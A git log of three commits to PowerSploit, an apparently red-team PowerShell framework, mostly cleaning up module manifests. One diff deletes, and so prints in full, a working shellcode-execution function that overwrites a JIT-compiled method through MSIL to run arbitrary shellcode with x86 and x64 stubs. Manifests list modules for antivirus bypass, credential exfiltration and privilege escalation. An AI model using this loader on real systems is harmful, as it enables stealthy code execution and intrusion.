From d0fff7b6371ccb52952268f47ae68e85c3aeeb91 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Wed, 4 Nov 2015 14:56:46 -0500 Subject: Migrating everything back to Invoke-Shellcode.ps1. I'm done making my point now. :P --- CodeExecution/CodeExecution.psd1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 8dc5b75..0d0799b 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -73,7 +73,7 @@ AliasesToExport = '' ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) # List of all files packaged with this module -FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke--Shellcode.ps1', 'Invoke-DllInjection.ps1', +FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess -- cgit v1.2.3 From 18b7a10f89eb5f1038c443b5b39d3a8e327fb090 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Thu, 5 Nov 2015 13:26:05 -0500 Subject: Removing Invoke-ShellcodeMSIL This was only ever intended to be a PoC. I'll bring this back if requested but it exhibits duplicate functionality. --- CodeExecution/CodeExecution.psd1 | 2 +- CodeExecution/Invoke-ShellcodeMSIL.ps1 | 267 --------------------------------- README.md | 4 - 3 files changed, 1 insertion(+), 272 deletions(-) delete mode 100644 CodeExecution/Invoke-ShellcodeMSIL.ps1 (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 0d0799b..96e9abc 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', - 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' + 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/CodeExecution/Invoke-ShellcodeMSIL.ps1 b/CodeExecution/Invoke-ShellcodeMSIL.ps1 deleted file mode 100644 index 158a643..0000000 --- a/CodeExecution/Invoke-ShellcodeMSIL.ps1 +++ /dev/null @@ -1,267 +0,0 @@ -function Invoke-ShellcodeMSIL -{ -<# -.SYNOPSIS - - Execute shellcode within the context of the running PowerShell process without making any Win32 function calls. - - PowerSploit Function: Invoke-ShellcodeMSIL - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - Invoke-ShellcodeMSIL executes shellcode by using specially crafted MSIL opcodes to overwrite a JITed dummy method. This technique is compelling because unlike Invoke-Shellcode, Invoke-ShellcodeMSIL doesn't call any Win32 functions. - -.PARAMETER Shellcode - - Specifies the shellcode to be executed. - -.EXAMPLE - - C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) - - Description - ----------- - Executes the following instructions - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) - Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! - -.NOTES - - Your shellcode must end in a ret (0xC3) and maintain proper stack alignment or PowerShell will crash! - - Use the '-Verbose' option to print detailed information. - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( Mandatory = $True )] - [ValidateNotNullOrEmpty()] - [Byte[]] - $Shellcode - ) - - function Get-MethodAddress - { - [CmdletBinding()] Param ( - [Parameter(Mandatory = $True, ValueFromPipeline = $True)] - [System.Reflection.MethodInfo] - $MethodInfo - ) - - if ($MethodInfo.MethodImplementationFlags -eq 'InternalCall') - { - Write-Warning "$($MethodInfo.Name) is an InternalCall method. These methods always point to the same address." - } - - try { $Type = [MethodLeaker] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - if ([IntPtr]::Size -eq 4) { $ReturnType = [UInt32] } else { $ReturnType = [UInt64] } - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly') - # Assemble in memory - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodLeakModule') - $TypeBuilder = $ModuleBuilder.DefineType('MethodLeaker', [System.Reflection.TypeAttributes]::Public) - # Declaration of the LeakMethod method - $MethodBuilder = $TypeBuilder.DefineMethod('LeakMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $ReturnType, $null) - $Generator = $MethodBuilder.GetILGenerator() - - # Push unmanaged pointer to MethodInfo onto the evaluation stack - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldftn, $MethodInfo) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - - # Assemble everything - $Type = $TypeBuilder.CreateType() - } - - $Method = $Type.GetMethod('LeakMethod') - - try - { - # Call the method and return its JITed address - $Address = $Method.Invoke($null, @()) - - Write-Output (New-Object IntPtr -ArgumentList $Address) - } - catch [System.Management.Automation.MethodInvocationException] - { - Write-Error "$($MethodInfo.Name) cannot return an unmanaged address." - } - } - -#region Define the method that will perform the overwrite - try { $SmasherType = [MethodSmasher] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('MethodSmasher') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $Att = New-Object System.Security.AllowPartiallyTrustedCallersAttribute - $Constructor = $Att.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $AssemblyBuilder.SetCustomAttribute($AttribBuilder) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodSmasher') - $ModAtt = New-Object System.Security.UnverifiableCodeAttribute - $Constructor = $ModAtt.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $ModAttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $ModuleBuilder.SetCustomAttribute($ModAttribBuilder) - $TypeBuilder = $ModuleBuilder.DefineType('MethodSmasher', [System.Reflection.TypeAttributes]::Public) - $Params = New-Object System.Type[](3) - $Params[0] = [IntPtr] - $Params[1] = [IntPtr] - $Params[2] = [Int32] - $MethodBuilder = $TypeBuilder.DefineMethod('OverwriteMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $Params) - $Generator = $MethodBuilder.GetILGenerator() - # The following MSIL opcodes are effectively a memcpy - # arg0 = destinationAddr, arg1 = sourceAddr, arg2 = length - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Volatile) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Cpblk) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - - $SmasherType = $TypeBuilder.CreateType() - } - - $OverwriteMethod = $SmasherType.GetMethod('OverwriteMethod') -#endregion - -#region Define the method that we're going to overwrite - try { $Type = [SmashMe] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('SmashMe') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $Att = New-Object System.Security.AllowPartiallyTrustedCallersAttribute - $Constructor = $Att.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $AssemblyBuilder.SetCustomAttribute($AttribBuilder) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SmashMe') - $ModAtt = New-Object System.Security.UnverifiableCodeAttribute - $Constructor = $ModAtt.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $ModAttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $ModuleBuilder.SetCustomAttribute($ModAttribBuilder) - $TypeBuilder = $ModuleBuilder.DefineType('SmashMe', [System.Reflection.TypeAttributes]::Public) - $Params = New-Object System.Type[](1) - $Params[0] = [Int] - $MethodBuilder = $TypeBuilder.DefineMethod('OverwriteMe', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $Params) - $Generator = $MethodBuilder.GetILGenerator() - $XorValue = 0x41424344 - $Generator.DeclareLocal([Int]) | Out-Null - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0) - # The following MSIL opcodes serve two purposes: - # 1) Serves as a dummy XOR function to take up space in memory when it gets jitted - # 2) A series of XOR instructions won't be optimized out. This way, I'll be guaranteed to sufficient space for my shellcode. - foreach ($CodeBlock in 1..100) - { - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $XorValue) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Xor) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Stloc_0) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0) - $XorValue++ - } - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $XorValue) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Xor) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - $Type = $TypeBuilder.CreateType() - } - - $TargetMethod = $Type.GetMethod('OverwriteMe') -#endregion - - # Force the target method to be JITed so that is can be cleanly overwritten - Write-Verbose 'Forcing target method to be JITed...' - - foreach ($Exec in 1..20) - { - $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null - } - - if ( [IntPtr]::Size -eq 4 ) - { - # x86 Shellcode stub - $FinalShellcode = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3) - <# - 00000000 60 pushad - 00000001 E804000000 call dword 0xa - 00000006 61 popad - 00000007 31C0 xor eax,eax - 00000009 C3 ret - YOUR SHELLCODE WILL BE PLACED HERE... - #> - - Write-Verbose 'Preparing x86 shellcode...' - } - else - { - # x86_64 shellcode stub - $FinalShellcode = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57, - 0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41, - 0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48, - 0x31,0xC0,0xC3) - <# - 00000000 4154 push r12 - 00000002 4155 push r13 - 00000004 4156 push r14 - 00000006 4157 push r15 - 00000008 55 push rbp - 00000009 E80D000000 call dword 0x1b - 0000000E 5D pop rbp - 0000000F 415F pop r15 - 00000011 415E pop r14 - 00000013 415D pop r13 - 00000015 415C pop r12 - 00000017 4831C0 xor rax,rax - 0000001A C3 ret - YOUR SHELLCODE WILL BE PLACED HERE... - #> - - Write-Verbose 'Preparing x86_64 shellcode...' - } - - # Append user-provided shellcode. - $FinalShellcode += $Shellcode - - # Allocate pinned memory for our shellcode - $ShellcodeAddress = [Runtime.InteropServices.Marshal]::AllocHGlobal($FinalShellcode.Length) - - Write-Verbose "Allocated shellcode at 0x$($ShellcodeAddress.ToString("X$([IntPtr]::Size*2)"))." - - # Copy the original shellcode bytes into the pinned, unmanaged memory. - # Note: this region of memory if marked PAGE_READWRITE - [Runtime.InteropServices.Marshal]::Copy($FinalShellcode, 0, $ShellcodeAddress, $FinalShellcode.Length) - - $TargetMethodAddress = [IntPtr] (Get-MethodAddress $TargetMethod) - - Write-Verbose "Address of the method to be overwritten: 0x$($TargetMethodAddress.ToString("X$([IntPtr]::Size*2)"))" - Write-Verbose 'Overwriting dummy method with the shellcode...' - - $Arguments = New-Object Object[](3) - $Arguments[0] = $TargetMethodAddress - $Arguments[1] = $ShellcodeAddress - $Arguments[2] = $FinalShellcode.Length - - # Overwrite the dummy method with the shellcode opcodes - $OverwriteMethod.Invoke($null, $Arguments) - - Write-Verbose 'Executing shellcode...' - - # 'Invoke' our shellcode >D - $ShellcodeReturnValue = $TargetMethod.Invoke($null, @(0x11112222)) - - if ($ShellcodeReturnValue -eq 0) - { - Write-Verbose 'Shellcode executed successfully!' - } -} diff --git a/README.md b/README.md index 4761e00..dcbd989 100644 --- a/README.md +++ b/README.md @@ -18,10 +18,6 @@ Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or Injects shellcode into the process ID of your choosing or within PowerShell locally. -#### `Invoke-ShellcodeMSIL` - -Execute shellcode within the context of the running PowerShell process without making any Win32 function calls. - #### `Invoke-WmiCommand` Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. -- cgit v1.2.3 From 9f183e36518176c4299eed5c68b7deac7f4e8025 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Fri, 18 Dec 2015 16:28:03 -0800 Subject: Set all module versions to 3.0 Also cleaned up some module manifest cruft. --- AntivirusBypass/AntivirusBypass.psd1 | 19 ++------- CodeExecution/CodeExecution.psd1 | 57 +-------------------------- Exfiltration/Exfiltration.psd1 | 17 +------- Mayhem/Mayhem.psd1 | 59 +--------------------------- Persistence/Persistence.psd1 | 5 +-- PowerSploit.psd1 | 17 ++++---- Privesc/Privesc.psd1 | 62 +----------------------------- Recon/Recon.psd1 | 59 +--------------------------- ScriptModification/ScriptModification.psd1 | 59 +--------------------------- 9 files changed, 19 insertions(+), 335 deletions(-) (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/AntivirusBypass/AntivirusBypass.psd1 b/AntivirusBypass/AntivirusBypass.psd1 index 507cfdb..037f570 100644 --- a/AntivirusBypass/AntivirusBypass.psd1 +++ b/AntivirusBypass/AntivirusBypass.psd1 @@ -1,9 +1,10 @@ @{ + # Script module or binary module file associated with this manifest. ModuleToProcess = 'AntivirusBypass.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' @@ -11,9 +12,6 @@ GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -26,18 +24,7 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}) - # List of all files packaged with this module FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' + } diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 96e9abc..93c2cd3 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'CodeExecution.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' @@ -24,65 +24,10 @@ Description = 'PowerSploit Code Execution Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) - # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' - -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 6776b14..da78493 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Exfiltration.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' @@ -12,9 +12,6 @@ GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -30,18 +27,6 @@ FormatsToProcess = 'Get-VaultCredential.ps1xml' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) - # List of all files packaged with this module FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', diff --git a/Mayhem/Mayhem.psd1 b/Mayhem/Mayhem.psd1 index 8eb0566..f28493f 100644 --- a/Mayhem/Mayhem.psd1 +++ b/Mayhem/Mayhem.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Mayhem.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' @@ -12,9 +12,6 @@ GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -24,64 +21,10 @@ Description = 'PowerSploit Mayhem Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'}) - # List of all files packaged with this module FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Persistence/Persistence.psd1 b/Persistence/Persistence.psd1 index e17faf1..ffcd875 100644 --- a/Persistence/Persistence.psd1 +++ b/Persistence/Persistence.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Persistence.psm1' # Version number of this module. -ModuleVersion = '1.1.1.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '633d0f10-a056-41da-869d-6d2f75430195' @@ -24,9 +24,6 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - # List of all files packaged with this module FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md' diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 10c59f2..bc482e1 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 @@ -3,7 +3,7 @@ ModuleToProcess = 'PowerSploit.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '6753b496-d842-40a3-924a-0f09e248640c' @@ -138,13 +138,13 @@ FunctionsToExport = @( ) # List of all modules packaged with this module. -ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, - @{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, - @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, - @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, - @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, - @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, - @{ModuleName = 'PrivEsc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) +ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '3.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, + @{ModuleName = 'CodeExecution'; ModuleVersion = '3.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, + @{ModuleName = 'Exfiltration'; ModuleVersion = '3.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, + @{ModuleName = 'Recon'; ModuleVersion = '3.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, + @{ModuleName = 'ScriptModification'; ModuleVersion = '3.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, + @{ModuleName = 'Persistence'; ModuleVersion = '3.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, + @{ModuleName = 'PrivEsc'; ModuleVersion = '3.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) PrivateData = @{ @@ -162,4 +162,5 @@ PrivateData = @{ } } + } diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index bca4261..34ebf7b 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Privesc.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' @@ -12,9 +12,6 @@ GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' # Author of this module Author = 'Will Schroder' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -24,39 +21,6 @@ Description = 'PowerSploit Privesc Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of Microsoft .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = @() - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = @( 'Get-ServiceUnquoted', @@ -81,32 +45,8 @@ FunctionsToExport = @( 'Invoke-AllChecks' ) -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '*' - -# Aliases to export from this module -AliasesToExport = '*' - -# DSC resources to export from this module -# DscResourcesToExport = @() - -# List of all modules packaged with this module -ModuleList = @(@{ModuleName = 'Privesc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'}) - # List of all files packaged with this module FileList = 'Privesc.psm1', 'PowerUp.ps1', 'README.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 5a4cfbe..55f19f7 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Recon.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' @@ -12,9 +12,6 @@ GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' # Author of this module Author = 'Matthew Graeber', 'Will Schroeder' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -24,39 +21,6 @@ Description = 'PowerSploit Reconnaissance Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = @( 'Get-ComputerDetails', @@ -125,29 +89,8 @@ FunctionsToExport = @( 'Invoke-MapDomainTrust' ) -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) - # List of all files packaged with this module FileList = 'Recon.psm1', 'Recon.psd1', 